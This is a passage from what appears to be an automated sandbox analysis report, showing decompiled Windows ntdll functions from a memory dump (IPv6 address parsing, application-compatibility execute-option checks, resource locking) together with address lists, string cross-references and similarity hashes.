						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                        0x01f813d5
                                                                                        0x01f813d9
                                                                                        0x01f813dc
                                                                                        0x01f813de
                                                                                        0x01f813e1
                                                                                        0x01f813e8
                                                                                        0x01f813ee
                                                                                        0x01fae8fd
                                                                                        0x00000000
                                                                                        0x01fae921
                                                                                        0x01fae921
                                                                                        0x01fae928
                                                                                        0x01fae982
                                                                                        0x01fae98a
                                                                                        0x00000000
                                                                                        0x01fae99a
                                                                                        0x01fae99e
                                                                                        0x01fae9a3
                                                                                        0x01fae9a8
                                                                                        0x01fae9b9
                                                                                        0x01fae978
                                                                                        0x00000000
                                                                                        0x01fae978
                                                                                        0x01fae98a
                                                                                        0x01fae92a
                                                                                        0x01fae931
                                                                                        0x01fae944
                                                                                        0x01fae944
                                                                                        0x01fae950
                                                                                        0x01fae954
                                                                                        0x01fae959
                                                                                        0x01fae95e
                                                                                        0x01fae963
                                                                                        0x01fae970
                                                                                        0x00000000
                                                                                        0x01fae975
                                                                                        0x01fae93b
                                                                                        0x01fae980
                                                                                        0x00000000
                                                                                        0x01fae980
                                                                                        0x01fae942
                                                                                        0x01fae94b
                                                                                        0x00000000
                                                                                        0x01fae94b
                                                                                        0x00000000
                                                                                        0x01fae942
                                                                                        0x01f813f4
                                                                                        0x01f813f4
                                                                                        0x01f813f9
                                                                                        0x01f813fc
                                                                                        0x01f813ff
                                                                                        0x01f81406
                                                                                        0x01fae9cc
                                                                                        0x01fae9d2
                                                                                        0x01fae9d2
                                                                                        0x01fae9cc
                                                                                        0x01f8140c
                                                                                        0x01f81411
                                                                                        0x01f81431
                                                                                        0x01f8143a
                                                                                        0x01f8143c
                                                                                        0x01f8143f
                                                                                        0x01f8143f
                                                                                        0x01f81442
                                                                                        0x01f81447
                                                                                        0x01f814a8
                                                                                        0x01f814ac
                                                                                        0x01fae9e2
                                                                                        0x01fae9e7
                                                                                        0x01fae9ec
                                                                                        0x01faea05
                                                                                        0x01faea05
                                                                                        0x00000000
                                                                                        0x01f81449
                                                                                        0x00000000
                                                                                        0x01f81449
                                                                                        0x01f8144c
                                                                                        0x01f81459
                                                                                        0x01f81462
                                                                                        0x01f81469
                                                                                        0x01f8146a
                                                                                        0x01f81470
                                                                                        0x01f81473
                                                                                        0x01f81476
                                                                                        0x01f81476
                                                                                        0x01f81490
                                                                                        0x01f81495
                                                                                        0x01f8138e
                                                                                        0x01f81390
                                                                                        0x01f81397
                                                                                        0x01f81398
                                                                                        0x01f81399
                                                                                        0x01f813a1
                                                                                        0x01f813a4
                                                                                        0x01f813a4
                                                                                        0x01f81498
                                                                                        0x01f8149c
                                                                                        0x01f8149f
                                                                                        0x01f814a2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f814a4
                                                                                        0x00000000
                                                                                        0x01f814a4
                                                                                        0x01f81413
                                                                                        0x01f81415
                                                                                        0x01f81416
                                                                                        0x01f81419
                                                                                        0x01f8141c
                                                                                        0x01f81422
                                                                                        0x01f813b7
                                                                                        0x01f813bc
                                                                                        0x01f813bf
                                                                                        0x01f813bf
                                                                                        0x01f813c2
                                                                                        0x01f81424
                                                                                        0x01f81424
                                                                                        0x01f81424
                                                                                        0x01f81427
                                                                                        0x01f8142b
                                                                                        0x01f8142c
                                                                                        0x01f8142c
                                                                                        0x01f8142c
                                                                                        0x00000000
                                                                                        0x01f8141c
                                                                                        0x01f81411

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                        • API String ID: 48624451-2108815105
                                                                                        • Opcode ID: 0ff3115a12d325e864d7f4261249c3b604c004abbc427fe92410231ec39111e2
                                                                                        • Instruction ID: d3da550bad9d99ccf33e80d507aba3b06be113067fde71e735d35340768419fd
                                                                                        • Opcode Fuzzy Hash: 0ff3115a12d325e864d7f4261249c3b604c004abbc427fe92410231ec39111e2
                                                                                        • Instruction Fuzzy Hash: 616155B1E04616EACB24EF5DC8908BFBBB5EF99300754C22EE5D647541D236A641CB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F77EFD, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 64%
                                                                                        			E01F77EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2022088; // 0x76801594
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E01F77F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E01F93F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E01F4DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2024218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E01F93F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E01F50D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E01F93F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E01F58375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E01F93F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E01FBE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E01F93F92();
					_t38 = 1;
					L2:
					return E01F4E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                        0x01f77f08
                                                                                        0x01f77f0f
                                                                                        0x01f77f12
                                                                                        0x01f77f1b
                                                                                        0x01f77f31
                                                                                        0x01f93ead
                                                                                        0x01f93eb4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f93eba
                                                                                        0x01f93ecd
                                                                                        0x01f93ed2
                                                                                        0x01f93ee1
                                                                                        0x01f93ee7
                                                                                        0x01f93eec
                                                                                        0x01f93f12
                                                                                        0x01f93f18
                                                                                        0x01f93f1a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f93f20
                                                                                        0x01f93f26
                                                                                        0x01f93f28
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f93f2e
                                                                                        0x01f93f30
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f93f3a
                                                                                        0x01f93f3b
                                                                                        0x01f93f53
                                                                                        0x01f93f64
                                                                                        0x01f93f69
                                                                                        0x01f93f6c
                                                                                        0x01f93f6d
                                                                                        0x01f93f6f
                                                                                        0x01f9e304
                                                                                        0x01f9e30f
                                                                                        0x01f9e315
                                                                                        0x01f9e31e
                                                                                        0x01f9e321
                                                                                        0x01f9e327
                                                                                        0x01f9e329
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f9e32f
                                                                                        0x01f9e32f
                                                                                        0x01f9e337
                                                                                        0x01f9e33a
                                                                                        0x01f9e33b
                                                                                        0x01f9e33d
                                                                                        0x01f9e33f
                                                                                        0x01f9e341
                                                                                        0x01f9e341
                                                                                        0x01f9e34e
                                                                                        0x01f9e353
                                                                                        0x01f9e358
                                                                                        0x01f9e35d
                                                                                        0x01f9e35f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f9e365
                                                                                        0x01f9e365
                                                                                        0x01f9e368
                                                                                        0x01f9e36e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f9e374
                                                                                        0x01f9e32f
                                                                                        0x01f93f75
                                                                                        0x01f93f7a
                                                                                        0x01f93f7c
                                                                                        0x01f93f7e
                                                                                        0x01f93f86
                                                                                        0x01f77f39
                                                                                        0x01f77f47
                                                                                        0x01f77f47
                                                                                        0x01f77f37
                                                                                        0x01f77f37
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01F93F12
                                                                                        Strings
                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01F93F75
                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01F9E345
                                                                                        • ExecuteOptions, xrefs: 01F93F04
                                                                                        • `'t, xrefs: 01F77F1E
                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01F9E2FB
                                                                                        • Execute=1, xrefs: 01F93F5E
                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01F93F4A
                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01F93EC4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: BaseDataModuleQuery
                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$`'t
                                                                                        • API String ID: 3901378454-2063213820
                                                                                        • Opcode ID: 281e80a2e66abd55ace26ae02270eaa5cebc1f1996312db808df38fb8545bfc2
                                                                                        • Instruction ID: 189721614aaea2417b5dd9be65d94d09ff73df50ae8487757d0fb9ae52699ed8
                                                                                        • Opcode Fuzzy Hash: 281e80a2e66abd55ace26ae02270eaa5cebc1f1996312db808df38fb8545bfc2
                                                                                        • Instruction Fuzzy Hash: C741DC71A4020DBBEF20EA95DCC9FDA77BCAB14704F0005AEF605E6041E772DA468BA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F80B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E01F80B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E01F58980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E01F4DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E01F80CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E01F80CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E01F806BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E01F806BA(_t135, _t178) == 0 || E01F80A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E01F80CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E01F80CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E01F806BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E01F806BA(_t124, _t142) == 0 || E01F80A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                                        0x01f80b21
                                                                                        0x01f80b24
                                                                                        0x01f80b27
                                                                                        0x01f80b2a
                                                                                        0x01f80b2d
                                                                                        0x01f80b30
                                                                                        0x01f80b33
                                                                                        0x01f80b36
                                                                                        0x01f80b39
                                                                                        0x01f80b3e
                                                                                        0x01f80c65
                                                                                        0x01f80c68
                                                                                        0x01f80c6a
                                                                                        0x01f80c6f
                                                                                        0x01faeb42
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faeb48
                                                                                        0x01faeb48
                                                                                        0x01f80c75
                                                                                        0x01f80c7a
                                                                                        0x01faeb54
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faeb5a
                                                                                        0x01f80c80
                                                                                        0x01f80c84
                                                                                        0x01faeb98
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faeba6
                                                                                        0x01f80cb8
                                                                                        0x01f80cba
                                                                                        0x01f80cd3
                                                                                        0x01f80cda
                                                                                        0x01f80ce4
                                                                                        0x01f80ce9
                                                                                        0x00000000
                                                                                        0x01f80cec
                                                                                        0x01f80c8c
                                                                                        0x01faeb63
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faeb70
                                                                                        0x01faeb75
                                                                                        0x01faeb7d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faeb8c
                                                                                        0x00000000
                                                                                        0x01faeb8c
                                                                                        0x01f80c96
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f80ca2
                                                                                        0x01f80cac
                                                                                        0x01f80cb4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f80b44
                                                                                        0x01f80b47
                                                                                        0x01f80b49
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f80b4f
                                                                                        0x01f80b50
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f80b56
                                                                                        0x01f80b62
                                                                                        0x01f80b7c
                                                                                        0x01f80bac
                                                                                        0x01f80a0f
                                                                                        0x01faeaaa
                                                                                        0x00000000
                                                                                        0x01faeac4
                                                                                        0x01faeac4
                                                                                        0x01f80bd0
                                                                                        0x01f80bd0
                                                                                        0x01f80bd4
                                                                                        0x01f80bd9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f80bdb
                                                                                        0x01f80be0
                                                                                        0x01faeb0e
                                                                                        0x01f80a1a
                                                                                        0x00000000
                                                                                        0x01f80a1a
                                                                                        0x01faeb1a
                                                                                        0x01faeb1f
                                                                                        0x01faeb27
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faeb36
                                                                                        0x00000000
                                                                                        0x01faeb36
                                                                                        0x01f80bea
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f80bf6
                                                                                        0x01f80c00
                                                                                        0x01f80c03
                                                                                        0x01f80c0b
                                                                                        0x00000000
                                                                                        0x01f80c0b
                                                                                        0x01faeaaa
                                                                                        0x00000000
                                                                                        0x01f80a15
                                                                                        0x01f80bb6
                                                                                        0x00000000
                                                                                        0x01f80bc6
                                                                                        0x01f80bc6
                                                                                        0x01f80bcb
                                                                                        0x01f80c15
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f80c1d
                                                                                        0x01f80c20
                                                                                        0x01f80c21
                                                                                        0x01f80c24
                                                                                        0x01f80c24
                                                                                        0x01f80c26
                                                                                        0x00000000
                                                                                        0x01f80c26
                                                                                        0x01f80bcd
                                                                                        0x00000000
                                                                                        0x01f80bcd
                                                                                        0x01f80b89
                                                                                        0x01f80b89
                                                                                        0x01f80b90
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f80b96
                                                                                        0x00000000
                                                                                        0x01f80b96
                                                                                        0x01f80a04
                                                                                        0x01f80a04
                                                                                        0x01f80b9a
                                                                                        0x01f80b9a
                                                                                        0x01f80b9b
                                                                                        0x01f80b9f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f80ba5
                                                                                        0x01f80ac7
                                                                                        0x01f80aca
                                                                                        0x01faeacf
                                                                                        0x00000000
                                                                                        0x01faeade
                                                                                        0x01faeade
                                                                                        0x01faeae3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faeaf3
                                                                                        0x01faeaf6
                                                                                        0x01faeaf7
                                                                                        0x01faeafe
                                                                                        0x01faeb01
                                                                                        0x00000000
                                                                                        0x01faeb01
                                                                                        0x01faeacf
                                                                                        0x01f80ad0
                                                                                        0x01f80ad4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f80ada
                                                                                        0x01f80ae6
                                                                                        0x01f80c34
                                                                                        0x00000000
                                                                                        0x01f80c47
                                                                                        0x01f80c49
                                                                                        0x01f80c4a
                                                                                        0x01f80c4e
                                                                                        0x01f80c51
                                                                                        0x01f80c54
                                                                                        0x01f80c57
                                                                                        0x01f80c5a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f80c60
                                                                                        0x01f80afb
                                                                                        0x01f80afe
                                                                                        0x01f80b02
                                                                                        0x01f80b05
                                                                                        0x01f80b08
                                                                                        0x00000000
                                                                                        0x01f80b08
                                                                                        0x01f80ae6
                                                                                        0x01f80b44
                                                                                        0x01f809f8
                                                                                        0x01f809f8
                                                                                        0x01f809f9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faeaa0
                                                                                        0x00000000

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: __fassign
                                                                                        • String ID: .$:$:
                                                                                        • API String ID: 3965848254-2308638275
                                                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                        • Instruction ID: 198654b0bcc1f45c31b3aee8ca4b48d81a42d0f3aeee7712a3b9d39b818817a2
                                                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                        • Instruction Fuzzy Hash: 45A1C171D0030ADFEF25EF58C8456BEBBB4AF06304FA4846AF812A7241DF365649CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F80554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 49%
                                                                                        			E01F80554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020201c0;
									_push(_t144);
									_push(0);
									_t51 = E01F3F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E01F84FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E01F93F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E01F93F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E01FC217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01F93F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E01F83915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020201c0;
												_push(_t138);
												_push(0);
												_t58 = E01F3F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
